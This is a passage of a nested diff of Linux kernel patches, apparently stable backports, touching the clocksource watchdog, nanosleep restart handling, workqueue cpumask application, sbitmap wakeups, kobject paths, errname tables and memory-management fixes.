++		 * watchdog/clocksource is very big, and affect the accuracy of
++		 * watchdog check. So give system some space and suspend the
++		 * watchdog check for 5 minutes.
++		 */
++		if (read_ret == WD_READ_SKIP) {
++			/*
++			 * As the watchdog timer will be suspended, and
++			 * cs->last could keep unchanged for 5 minutes, reset
++			 * the counters.
++			 */
++			clocksource_reset_watchdog();
++			extra_wait = HZ * 300;
++			break;
++		}
++
+ 		/* Clocksource initialized ? */
+ 		if (!(cs->flags & CLOCK_SOURCE_WATCHDOG) ||
+ 		    atomic_read(&watchdog_reset_pending)) {
+@@ -512,7 +539,7 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 	 * pair clocksource_stop_watchdog() clocksource_start_watchdog().
+ 	 */
+ 	if (!timer_pending(&watchdog_timer)) {
+-		watchdog_timer.expires += WATCHDOG_INTERVAL;
++		watchdog_timer.expires += WATCHDOG_INTERVAL + extra_wait;
+ 		add_timer_on(&watchdog_timer, next_cpu);
+ 	}
+ out:
+@@ -537,14 +564,6 @@ static inline void clocksource_stop_watchdog(void)
+ 	watchdog_running = 0;
+ }
+ 
+-static inline void clocksource_reset_watchdog(void)
+-{
+-	struct clocksource *cs;
+-
+-	list_for_each_entry(cs, &watchdog_list, wd_list)
+-		cs->flags &= ~CLOCK_SOURCE_WATCHDOG;
+-}
+-
+ static void clocksource_resume_watchdog(void)
+ {
+ 	atomic_inc(&watchdog_reset_pending);
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab62603..e4f0e3b0c4f4f 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2126,6 +2126,7 @@ SYSCALL_DEFINE2(nanosleep, struct __kernel_timespec __user *, rqtp,
+ 	if (!timespec64_valid(&tu))
+ 		return -EINVAL;
+ 
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 	return hrtimer_nanosleep(timespec64_to_ktime(tu), HRTIMER_MODE_REL,
+@@ -2147,6 +2148,7 @@ SYSCALL_DEFINE2(nanosleep_time32, struct old_timespec32 __user *, rqtp,
+ 	if (!timespec64_valid(&tu))
+ 		return -EINVAL;
+ 
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 	return hrtimer_nanosleep(timespec64_to_ktime(tu), HRTIMER_MODE_REL,
+diff --git a/kernel/time/posix-stubs.c b/kernel/time/posix-stubs.c
+index 90ea5f373e50e..828aeecbd1e8a 100644
+--- a/kernel/time/posix-stubs.c
++++ b/kernel/time/posix-stubs.c
+@@ -147,6 +147,7 @@ SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 	texp = timespec64_to_ktime(t);
+@@ -240,6 +241,7 @@ SYSCALL_DEFINE4(clock_nanosleep_time32, clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 	texp = timespec64_to_ktime(t);
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 5dead89308b74..0c8a87a11b39d 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -1270,6 +1270,7 @@ SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 
+@@ -1297,6 +1298,7 @@ SYSCALL_DEFINE4(clock_nanosleep_time32, clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 
+diff --git a/kernel/time/test_udelay.c b/kernel/time/test_udelay.c
+index 13b11eb62685e..20d5df631570e 100644
+--- a/kernel/time/test_udelay.c
++++ b/kernel/time/test_udelay.c
+@@ -149,7 +149,7 @@ module_init(udelay_test_init);
+ static void __exit udelay_test_exit(void)
+ {
+ 	mutex_lock(&udelay_test_lock);
+-	debugfs_remove(debugfs_lookup(DEBUGFS_FILENAME, NULL));
++	debugfs_lookup_and_remove(DEBUGFS_FILENAME, NULL);
+ 	mutex_unlock(&udelay_test_lock);
+ }
+ 
+diff --git a/kernel/torture.c b/kernel/torture.c
+index 789aeb0e1159c..9266ca168b8f5 100644
+--- a/kernel/torture.c
++++ b/kernel/torture.c
+@@ -915,7 +915,7 @@ void torture_kthread_stopping(char *title)
+ 	VERBOSE_TOROUT_STRING(buf);
+ 	while (!kthread_should_stop()) {
+ 		torture_shutdown_absorb(title);
+-		schedule_timeout_uninterruptible(1);
++		schedule_timeout_uninterruptible(HZ / 20);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(torture_kthread_stopping);
+diff --git a/kernel/trace/blktrace.c b/kernel/trace/blktrace.c
+index a66cff5a18579..a5b35bcfb0602 100644
+--- a/kernel/trace/blktrace.c
++++ b/kernel/trace/blktrace.c
+@@ -320,8 +320,8 @@ static void blk_trace_free(struct request_queue *q, struct blk_trace *bt)
+ 	 * under 'q->debugfs_dir', thus lookup and remove them.
+ 	 */
+ 	if (!bt->dir) {
+-		debugfs_remove(debugfs_lookup("dropped", q->debugfs_dir));
+-		debugfs_remove(debugfs_lookup("msg", q->debugfs_dir));
++		debugfs_lookup_and_remove("dropped", q->debugfs_dir);
++		debugfs_lookup_and_remove("msg", q->debugfs_dir);
+ 	} else {
+ 		debugfs_remove(bt->dir);
+ 	}
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index b21bf14bae9bd..c35e08b74014f 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1580,19 +1580,6 @@ static int rb_check_bpage(struct ring_buffer_per_cpu *cpu_buffer,
+ 	return 0;
+ }
+ 
+-/**
+- * rb_check_list - make sure a pointer to a list has the last bits zero
+- */
+-static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
+-			 struct list_head *list)
+-{
+-	if (RB_WARN_ON(cpu_buffer, rb_list_head(list->prev) != list->prev))
+-		return 1;
+-	if (RB_WARN_ON(cpu_buffer, rb_list_head(list->next) != list->next))
+-		return 1;
+-	return 0;
+-}
+-
+ /**
+  * rb_check_pages - integrity check of buffer pages
+  * @cpu_buffer: CPU buffer with pages to test
+@@ -1602,36 +1589,27 @@ static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
+  */
+ static int rb_check_pages(struct ring_buffer_per_cpu *cpu_buffer)
+ {
+-	struct list_head *head = cpu_buffer->pages;
+-	struct buffer_page *bpage, *tmp;
++	struct list_head *head = rb_list_head(cpu_buffer->pages);
++	struct list_head *tmp;
+ 
+-	/* Reset the head page if it exists */
+-	if (cpu_buffer->head_page)
+-		rb_set_head_page(cpu_buffer);
+-
+-	rb_head_page_deactivate(cpu_buffer);
+-
+-	if (RB_WARN_ON(cpu_buffer, head->next->prev != head))
+-		return -1;
+-	if (RB_WARN_ON(cpu_buffer, head->prev->next != head))
++	if (RB_WARN_ON(cpu_buffer,
++			rb_list_head(rb_list_head(head->next)->prev) != head))
+ 		return -1;
+ 
+-	if (rb_check_list(cpu_buffer, head))
++	if (RB_WARN_ON(cpu_buffer,
++			rb_list_head(rb_list_head(head->prev)->next) != head))
+ 		return -1;
+ 
+-	list_for_each_entry_safe(bpage, tmp, head, list) {
++	for (tmp = rb_list_head(head->next); tmp != head; tmp = rb_list_head(tmp->next)) {
+ 		if (RB_WARN_ON(cpu_buffer,
+-			       bpage->list.next->prev != &bpage->list))
++				rb_list_head(rb_list_head(tmp->next)->prev) != tmp))
+ 			return -1;
++
+ 		if (RB_WARN_ON(cpu_buffer,
+-			       bpage->list.prev->next != &bpage->list))
+-			return -1;
+-		if (rb_check_list(cpu_buffer, &bpage->list))
++				rb_list_head(rb_list_head(tmp->prev)->next) != tmp))
+ 			return -1;
+ 	}
+ 
+-	rb_head_page_activate(cpu_buffer);
+-
+ 	return 0;
+ }
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index a387bdc6af013..f70765780ed3f 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5599,7 +5599,7 @@ static const char readme_msg[] =
+ #ifdef CONFIG_HIST_TRIGGERS
+ 	"\t           s:[synthetic/]<event> <field> [<field>]\n"
+ #endif
+-	"\t           e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>]\n"
++	"\t           e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>] [if <filter>]\n"
+ 	"\t           -:[<group>/][<event>]\n"
+ #ifdef CONFIG_KPROBE_EVENTS
+ 	"\t    place: [<module>:]<symbol>[+<offset>]|<memaddr>\n"
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 7cd5f5e7e0a1b..8e21c352c1558 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -326,7 +326,7 @@ static struct rcuwait manager_wait = __RCUWAIT_INITIALIZER(manager_wait);
+ static LIST_HEAD(workqueues);		/* PR: list of all workqueues */
+ static bool workqueue_freezing;		/* PL: have wqs started freezing? */
+ 
+-/* PL: allowable cpus for unbound wqs and work items */
++/* PL&A: allowable cpus for unbound wqs and work items */
+ static cpumask_var_t wq_unbound_cpumask;
+ 
+ /* CPU where unbound work was last round robin scheduled from this CPU */
+@@ -3952,7 +3952,8 @@ static void apply_wqattrs_cleanup(struct apply_wqattrs_ctx *ctx)
+ /* allocate the attrs and pwqs for later installation */
+ static struct apply_wqattrs_ctx *
+ apply_wqattrs_prepare(struct workqueue_struct *wq,
+-		      const struct workqueue_attrs *attrs)
++		      const struct workqueue_attrs *attrs,
++		      const cpumask_var_t unbound_cpumask)
+ {
+ 	struct apply_wqattrs_ctx *ctx;
+ 	struct workqueue_attrs *new_attrs, *tmp_attrs;
+@@ -3968,14 +3969,15 @@ apply_wqattrs_prepare(struct workqueue_struct *wq,
+ 		goto out_free;
+ 
+ 	/*
+-	 * Calculate the attrs of the default pwq.
++	 * Calculate the attrs of the default pwq with unbound_cpumask
++	 * which is wq_unbound_cpumask or to set to wq_unbound_cpumask.
+ 	 * If the user configured cpumask doesn't overlap with the
+ 	 * wq_unbound_cpumask, we fallback to the wq_unbound_cpumask.
+ 	 */
+ 	copy_workqueue_attrs(new_attrs, attrs);
+-	cpumask_and(new_attrs->cpumask, new_attrs->cpumask, wq_unbound_cpumask);
++	cpumask_and(new_attrs->cpumask, new_attrs->cpumask, unbound_cpumask);
+ 	if (unlikely(cpumask_empty(new_attrs->cpumask)))
+-		cpumask_copy(new_attrs->cpumask, wq_unbound_cpumask);
++		cpumask_copy(new_attrs->cpumask, unbound_cpumask);
+ 
+ 	/*
+ 	 * We may create multiple pwqs with differing cpumasks.  Make a
+@@ -4072,7 +4074,7 @@ static int apply_workqueue_attrs_locked(struct workqueue_struct *wq,
+ 		wq->flags &= ~__WQ_ORDERED;
+ 	}
+ 
+-	ctx = apply_wqattrs_prepare(wq, attrs);
++	ctx = apply_wqattrs_prepare(wq, attrs, wq_unbound_cpumask);
+ 	if (!ctx)
+ 		return -ENOMEM;
+ 
+@@ -5334,7 +5336,7 @@ out_unlock:
+ }
+ #endif /* CONFIG_FREEZER */
+ 
+-static int workqueue_apply_unbound_cpumask(void)
++static int workqueue_apply_unbound_cpumask(const cpumask_var_t unbound_cpumask)
+ {
+ 	LIST_HEAD(ctxs);
+ 	int ret = 0;
+@@ -5350,7 +5352,7 @@ static int workqueue_apply_unbound_cpumask(void)
+ 		if (wq->flags & __WQ_ORDERED)
+ 			continue;
+ 
+-		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs);
++		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs, unbound_cpumask);
+ 		if (!ctx) {
+ 			ret = -ENOMEM;
+ 			break;
+@@ -5365,6 +5367,11 @@ static int workqueue_apply_unbound_cpumask(void)
+ 		apply_wqattrs_cleanup(ctx);
+ 	}
+ 
++	if (!ret) {
++		mutex_lock(&wq_pool_attach_mutex);
++		cpumask_copy(wq_unbound_cpumask, unbound_cpumask);
++		mutex_unlock(&wq_pool_attach_mutex);
++	}
+ 	return ret;
+ }
+ 
+@@ -5383,7 +5390,6 @@ static int workqueue_apply_unbound_cpumask(void)
+ int workqueue_set_unbound_cpumask(cpumask_var_t cpumask)
+ {
+ 	int ret = -EINVAL;
+-	cpumask_var_t saved_cpumask;
+ 
+ 	/*
+ 	 * Not excluding isolated cpus on purpose.
+@@ -5397,23 +5403,8 @@ int workqueue_set_unbound_cpumask(cpumask_var_t cpumask)
+ 			goto out_unlock;
+ 		}
+ 
+-		if (!zalloc_cpumask_var(&saved_cpumask, GFP_KERNEL)) {
+-			ret = -ENOMEM;
+-			goto out_unlock;
+-		}
+-
+-		/* save the old wq_unbound_cpumask. */
+-		cpumask_copy(saved_cpumask, wq_unbound_cpumask);
+-
+-		/* update wq_unbound_cpumask at first and apply it to wqs. */
+-		cpumask_copy(wq_unbound_cpumask, cpumask);
+-		ret = workqueue_apply_unbound_cpumask();
+-
+-		/* restore the wq_unbound_cpumask when failed. */
+-		if (ret < 0)
+-			cpumask_copy(wq_unbound_cpumask, saved_cpumask);
++		ret = workqueue_apply_unbound_cpumask(cpumask);
+ 
+-		free_cpumask_var(saved_cpumask);
+ out_unlock:
+ 		apply_wqattrs_unlock();
+ 	}
+diff --git a/lib/bug.c b/lib/bug.c
+index c223a2575b721..e0ff219899902 100644
+--- a/lib/bug.c
++++ b/lib/bug.c
+@@ -47,6 +47,7 @@
+ #include <linux/sched.h>
+ #include <linux/rculist.h>
+ #include <linux/ftrace.h>
++#include <linux/context_tracking.h>
+ 
+ extern struct bug_entry __start___bug_table[], __stop___bug_table[];
+ 
+@@ -153,7 +154,7 @@ struct bug_entry *find_bug(unsigned long bugaddr)
+ 	return module_find_bug(bugaddr);
+ }
+ 
+-enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
++static enum bug_trap_type __report_bug(unsigned long bugaddr, struct pt_regs *regs)
+ {
+ 	struct bug_entry *bug;
+ 	const char *file;
+@@ -209,6 +210,18 @@ enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
+ 	return BUG_TRAP_TYPE_BUG;
+ }
+ 
++enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
++{
++	enum bug_trap_type ret;
++	bool rcu = false;
++
++	rcu = warn_rcu_enter();
++	ret = __report_bug(bugaddr, regs);
++	warn_rcu_exit(rcu);
++
++	return ret;
++}
++
+ static void clear_once_table(struct bug_entry *start, struct bug_entry *end)
+ {
+ 	struct bug_entry *bug;
+diff --git a/lib/errname.c b/lib/errname.c
+index 05cbf731545f0..67739b174a8cc 100644
+--- a/lib/errname.c
++++ b/lib/errname.c
+@@ -21,6 +21,7 @@ static const char *names_0[] = {
+ 	E(EADDRNOTAVAIL),
+ 	E(EADV),
+ 	E(EAFNOSUPPORT),
++	E(EAGAIN), /* EWOULDBLOCK */
+ 	E(EALREADY),
+ 	E(EBADE),
+ 	E(EBADF),
+@@ -31,15 +32,17 @@ static const char *names_0[] = {
+ 	E(EBADSLT),
+ 	E(EBFONT),
+ 	E(EBUSY),
+-#ifdef ECANCELLED
+-	E(ECANCELLED),
+-#endif
++	E(ECANCELED), /* ECANCELLED */
+ 	E(ECHILD),
+ 	E(ECHRNG),
+ 	E(ECOMM),
+ 	E(ECONNABORTED),
++	E(ECONNREFUSED), /* EREFUSED */
+ 	E(ECONNRESET),
++	E(EDEADLK), /* EDEADLOCK */
++#if EDEADLK != EDEADLOCK /* mips, sparc, powerpc */
+ 	E(EDEADLOCK),
++#endif
+ 	E(EDESTADDRREQ),
+ 	E(EDOM),
+ 	E(EDOTDOT),
+@@ -166,14 +169,17 @@ static const char *names_0[] = {
+ 	E(EUSERS),
+ 	E(EXDEV),
+ 	E(EXFULL),
+-
+-	E(ECANCELED), /* ECANCELLED */
+-	E(EAGAIN), /* EWOULDBLOCK */
+-	E(ECONNREFUSED), /* EREFUSED */
+-	E(EDEADLK), /* EDEADLOCK */
+ };
+ #undef E
+ 
++#ifdef EREFUSED /* parisc */
++static_assert(EREFUSED == ECONNREFUSED);
++#endif
++#ifdef ECANCELLED /* parisc */
++static_assert(ECANCELLED == ECANCELED);
++#endif
++static_assert(EAGAIN == EWOULDBLOCK); /* everywhere */
++
+ #define E(err) [err - 512 + BUILD_BUG_ON_ZERO(err < 512 || err > 550)] = "-" #err
+ static const char *names_512[] = {
+ 	E(ERESTARTSYS),
+diff --git a/lib/kobject.c b/lib/kobject.c
+index a0b2dbfcfa233..aa375a5d94419 100644
+--- a/lib/kobject.c
++++ b/lib/kobject.c
+@@ -94,10 +94,10 @@ static int create_dir(struct kobject *kobj)
+ 	return 0;
+ }
+ 
+-static int get_kobj_path_length(struct kobject *kobj)
++static int get_kobj_path_length(const struct kobject *kobj)
+ {
+ 	int length = 1;
+-	struct kobject *parent = kobj;
++	const struct kobject *parent = kobj;
+ 
+ 	/* walk up the ancestors until we hit the one pointing to the
+ 	 * root.
+@@ -112,21 +112,25 @@ static int get_kobj_path_length(struct kobject *kobj)
+ 	return length;
+ }
+ 
+-static void fill_kobj_path(struct kobject *kobj, char *path, int length)
++static int fill_kobj_path(const struct kobject *kobj, char *path, int length)
+ {
+-	struct kobject *parent;
++	const struct kobject *parent;
+ 
+ 	--length;
+ 	for (parent = kobj; parent; parent = parent->parent) {
+ 		int cur = strlen(kobject_name(parent));
+ 		/* back up enough to print this name with '/' */
+ 		length -= cur;
++		if (length <= 0)
++			return -EINVAL;
+ 		memcpy(path + length, kobject_name(parent), cur);
+ 		*(path + --length) = '/';
+ 	}
+ 
+ 	pr_debug("kobject: '%s' (%p): %s: path = '%s'\n", kobject_name(kobj),
+ 		 kobj, __func__, path);
++
++	return 0;
+ }
+ 
+ /**
+@@ -136,18 +140,22 @@ static void fill_kobj_path(struct kobject *kobj, char *path, int length)
+  *
+  * Return: The newly allocated memory, caller must free with kfree().
+  */
+-char *kobject_get_path(struct kobject *kobj, gfp_t gfp_mask)
++char *kobject_get_path(const struct kobject *kobj, gfp_t gfp_mask)
+ {
+ 	char *path;
+ 	int len;
+ 
++retry:
+ 	len = get_kobj_path_length(kobj);
+ 	if (len == 0)
+ 		return NULL;
+ 	path = kzalloc(len, gfp_mask);
+ 	if (!path)
+ 		return NULL;
+-	fill_kobj_path(kobj, path, len);
++	if (fill_kobj_path(kobj, path, len)) {
++		kfree(path);
++		goto retry;
++	}
+ 
+ 	return path;
+ }
+diff --git a/lib/mpi/mpicoder.c b/lib/mpi/mpicoder.c
+index 39c4c67310946..3cb6bd148fa9e 100644
+--- a/lib/mpi/mpicoder.c
++++ b/lib/mpi/mpicoder.c
+@@ -504,7 +504,8 @@ MPI mpi_read_raw_from_sgl(struct scatterlist *sgl, unsigned int nbytes)
+ 
+ 	while (sg_miter_next(&miter)) {
+ 		buff = miter.addr;
+-		len = miter.length;
++		len = min_t(unsigned, miter.length, nbytes);
++		nbytes -= len;
+ 
+ 		for (x = 0; x < len; x++) {
+ 			a <<= 8;
+diff --git a/lib/sbitmap.c b/lib/sbitmap.c
+index 7280ae8ca88c7..c515072eca296 100644
+--- a/lib/sbitmap.c
++++ b/lib/sbitmap.c
+@@ -434,6 +434,8 @@ int sbitmap_queue_init_node(struct sbitmap_queue *sbq, unsigned int depth,
+ 	sbq->wake_batch = sbq_calc_wake_batch(sbq, depth);
+ 	atomic_set(&sbq->wake_index, 0);
+ 	atomic_set(&sbq->ws_active, 0);
++	atomic_set(&sbq->completion_cnt, 0);
++	atomic_set(&sbq->wakeup_cnt, 0);
+ 
+ 	sbq->ws = kzalloc_node(SBQ_WAIT_QUEUES * sizeof(*sbq->ws), flags, node);
+ 	if (!sbq->ws) {
+@@ -441,54 +443,33 @@ int sbitmap_queue_init_node(struct sbitmap_queue *sbq, unsigned int depth,
+ 		return -ENOMEM;
+ 	}
+ 
+-	for (i = 0; i < SBQ_WAIT_QUEUES; i++) {
++	for (i = 0; i < SBQ_WAIT_QUEUES; i++)
+ 		init_waitqueue_head(&sbq->ws[i].wait);
+-		atomic_set(&sbq->ws[i].wait_cnt, sbq->wake_batch);
+-	}
+ 
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_queue_init_node);
+ 
+-static inline void __sbitmap_queue_update_wake_batch(struct sbitmap_queue *sbq,
+-					    unsigned int wake_batch)
+-{
+-	int i;
+-
+-	if (sbq->wake_batch != wake_batch) {
+-		WRITE_ONCE(sbq->wake_batch, wake_batch);
+-		/*
+-		 * Pairs with the memory barrier in sbitmap_queue_wake_up()
+-		 * to ensure that the batch size is updated before the wait
+-		 * counts.
+-		 */
+-		smp_mb();
+-		for (i = 0; i < SBQ_WAIT_QUEUES; i++)
+-			atomic_set(&sbq->ws[i].wait_cnt, 1);
+-	}
+-}
+-
+ static void sbitmap_queue_update_wake_batch(struct sbitmap_queue *sbq,
+ 					    unsigned int depth)
+ {
+ 	unsigned int wake_batch;
+ 
+ 	wake_batch = sbq_calc_wake_batch(sbq, depth);
+-	__sbitmap_queue_update_wake_batch(sbq, wake_batch);
++	if (sbq->wake_batch != wake_batch)
++		WRITE_ONCE(sbq->wake_batch, wake_batch);
+ }
+ 
+ void sbitmap_queue_recalculate_wake_batch(struct sbitmap_queue *sbq,
+ 					    unsigned int users)
+ {
+ 	unsigned int wake_batch;
+-	unsigned int min_batch;
+ 	unsigned int depth = (sbq->sb.depth + users - 1) / users;
+ 
+-	min_batch = sbq->sb.depth >= (4 * SBQ_WAIT_QUEUES) ? 4 : 1;
+-
+ 	wake_batch = clamp_val(depth / SBQ_WAIT_QUEUES,
+-			min_batch, SBQ_WAKE_BATCH);
+-	__sbitmap_queue_update_wake_batch(sbq, wake_batch);
++			1, SBQ_WAKE_BATCH);
++
++	WRITE_ONCE(sbq->wake_batch, wake_batch);
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_queue_recalculate_wake_batch);
+ 
+@@ -537,11 +518,9 @@ unsigned long __sbitmap_queue_get_batch(struct sbitmap_queue *sbq, int nr_tags,
+ 
+ 			get_mask = ((1UL << nr_tags) - 1) << nr;
+ 			val = READ_ONCE(map->word);
+-			do {
+-				if ((val & ~get_mask) != val)
+-					goto next;
+-			} while (!atomic_long_try_cmpxchg(ptr, &val,
+-							  get_mask | val));
++			while (!atomic_long_try_cmpxchg(ptr, &val,
++							  get_mask | val))
++				;
+ 			get_mask = (get_mask & ~val) >> nr;
+ 			if (get_mask) {
+ 				*offset = nr + (index << sb->shift);
+@@ -576,106 +555,56 @@ void sbitmap_queue_min_shallow_depth(struct sbitmap_queue *sbq,
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_queue_min_shallow_depth);
+ 
+-static struct sbq_wait_state *sbq_wake_ptr(struct sbitmap_queue *sbq)
++static void __sbitmap_queue_wake_up(struct sbitmap_queue *sbq, int nr)
+ {
+ 	int i, wake_index;
+ 
+ 	if (!atomic_read(&sbq->ws_active))
+-		return NULL;
++		return;
+ 
+ 	wake_index = atomic_read(&sbq->wake_index);
+ 	for (i = 0; i < SBQ_WAIT_QUEUES; i++) {
+ 		struct sbq_wait_state *ws = &sbq->ws[wake_index];
+ 
+-		if (waitqueue_active(&ws->wait) && atomic_read(&ws->wait_cnt)) {
+-			if (wake_index != atomic_read(&sbq->wake_index))
+-				atomic_set(&sbq->wake_index, wake_index);
+-			return ws;
+-		}
+-
++		/*
++		 * Advance the index before checking the current queue.
++		 * It improves fairness, by ensuring the queue doesn't
++		 * need to be fully emptied before trying to wake up
++		 * from the next one.
++		 */
+ 		wake_index = sbq_index_inc(wake_index);
++
++		/*
++		 * It is sufficient to wake up at least one waiter to
++		 * guarantee forward progress.
++		 */
++		if (waitqueue_active(&ws->wait) &&
++		    wake_up_nr(&ws->wait, nr))
++			break;
+ 	}
+ 
+-	return NULL;
++	if (wake_index != atomic_read(&sbq->wake_index))
++		atomic_set(&sbq->wake_index, wake_index);
+ }
+ 
+-static bool __sbq_wake_up(struct sbitmap_queue *sbq, int *nr)
++void sbitmap_queue_wake_up(struct sbitmap_queue *sbq, int nr)
+ {
+-	struct sbq_wait_state *ws;
+-	unsigned int wake_batch;
+-	int wait_cnt, cur, sub;
+-	bool ret;
++	unsigned int wake_batch = READ_ONCE(sbq->wake_batch);
++	unsigned int wakeups;
+ 
+-	if (*nr <= 0)
+-		return false;
++	if (!atomic_read(&sbq->ws_active))
++		return;
+ 
+-	ws = sbq_wake_ptr(sbq);
+-	if (!ws)
+-		return false;
++	atomic_add(nr, &sbq->completion_cnt);
++	wakeups = atomic_read(&sbq->wakeup_cnt);
+ 
+-	cur = atomic_read(&ws->wait_cnt);
+ 	do {
+-		/*
+-		 * For concurrent callers of this, callers should call this
+-		 * function again to wakeup a new batch on a different 'ws'.
+-		 */
+-		if (cur == 0)
+-			return true;
+-		sub = min(*nr, cur);
+-		wait_cnt = cur - sub;
+-	} while (!atomic_try_cmpxchg(&ws->wait_cnt, &cur, wait_cnt));
+-
+-	/*
+-	 * If we decremented queue without waiters, retry to avoid lost
+-	 * wakeups.
+-	 */
+-	if (wait_cnt > 0)
+-		return !waitqueue_active(&ws->wait);
+-
+-	*nr -= sub;
+-
+-	/*
+-	 * When wait_cnt == 0, we have to be particularly careful as we are
+-	 * responsible to reset wait_cnt regardless whether we've actually
+-	 * woken up anybody. But in case we didn't wakeup anybody, we still
+-	 * need to retry.
+-	 */
+-	ret = !waitqueue_active(&ws->wait);
+-	wake_batch = READ_ONCE(sbq->wake_batch);
+-
+-	/*
+-	 * Wake up first in case that concurrent callers decrease wait_cnt
+-	 * while waitqueue is empty.
+-	 */
+-	wake_up_nr(&ws->wait, wake_batch);
++		if (atomic_read(&sbq->completion_cnt) - wakeups < wake_batch)
++			return;
++	} while (!atomic_try_cmpxchg(&sbq->wakeup_cnt,
++				     &wakeups, wakeups + wake_batch));
+ 
+-	/*
+-	 * Pairs with the memory barrier in sbitmap_queue_resize() to
+-	 * ensure that we see the batch size update before the wait
+-	 * count is reset.
+-	 *
+-	 * Also pairs with the implicit barrier between decrementing wait_cnt
+-	 * and checking for waitqueue_active() to make sure waitqueue_active()
+-	 * sees result of the wakeup if atomic_dec_return() has seen the result
+-	 * of atomic_set().
+-	 */
+-	smp_mb__before_atomic();
+-
+-	/*
+-	 * Increase wake_index before updating wait_cnt, otherwise concurrent
+-	 * callers can see valid wait_cnt in old waitqueue, which can cause
+-	 * invalid wakeup on the old waitqueue.
+-	 */
+-	sbq_index_atomic_inc(&sbq->wake_index);
+-	atomic_set(&ws->wait_cnt, wake_batch);
+-
+-	return ret || *nr;
+-}
+-
+-void sbitmap_queue_wake_up(struct sbitmap_queue *sbq, int nr)
+-{
+-	while (__sbq_wake_up(sbq, &nr))
+-		;
++	__sbitmap_queue_wake_up(sbq, wake_batch);
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_queue_wake_up);
+ 
+@@ -792,9 +721,7 @@ void sbitmap_queue_show(struct sbitmap_queue *sbq, struct seq_file *m)
+ 	seq_puts(m, "ws={\n");
+ 	for (i = 0; i < SBQ_WAIT_QUEUES; i++) {
+ 		struct sbq_wait_state *ws = &sbq->ws[i];
+-
+-		seq_printf(m, "\t{.wait_cnt=%d, .wait=%s},\n",
+-			   atomic_read(&ws->wait_cnt),
++		seq_printf(m, "\t{.wait=%s},\n",
+ 			   waitqueue_active(&ws->wait) ? "active" : "inactive");
+ 	}
+ 	seq_puts(m, "}\n");
+diff --git a/mm/damon/paddr.c b/mm/damon/paddr.c
+index e1a4315c4be6a..402d30b37aba9 100644
+--- a/mm/damon/paddr.c
++++ b/mm/damon/paddr.c
+@@ -219,12 +219,11 @@ static unsigned long damon_pa_pageout(struct damon_region *r)
+ 			put_page(page);
+ 			continue;
+ 		}
+-		if (PageUnevictable(page)) {
++		if (PageUnevictable(page))
+ 			putback_lru_page(page);
+-		} else {
++		else
+ 			list_add(&page->lru, &page_list);
+-			put_page(page);
+-		}
++		put_page(page);
+ 	}
+ 	applied = reclaim_pages(&page_list);
+ 	cond_resched();
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index e7cf013a0efd0..0729973d486a6 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2818,6 +2818,9 @@ void deferred_split_huge_page(struct page *page)
+ 	if (PageSwapCache(page))
+ 		return;
+ 
++	if (!list_empty(page_deferred_list(page)))
++		return;
++
+ 	spin_lock_irqsave(&ds_queue->split_queue_lock, flags);
+ 	if (list_empty(page_deferred_list(page))) {
+ 		count_vm_event(THP_DEFERRED_SPLIT_PAGE);
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 266a1ab054341..3e8f1ad0fe9db 100644
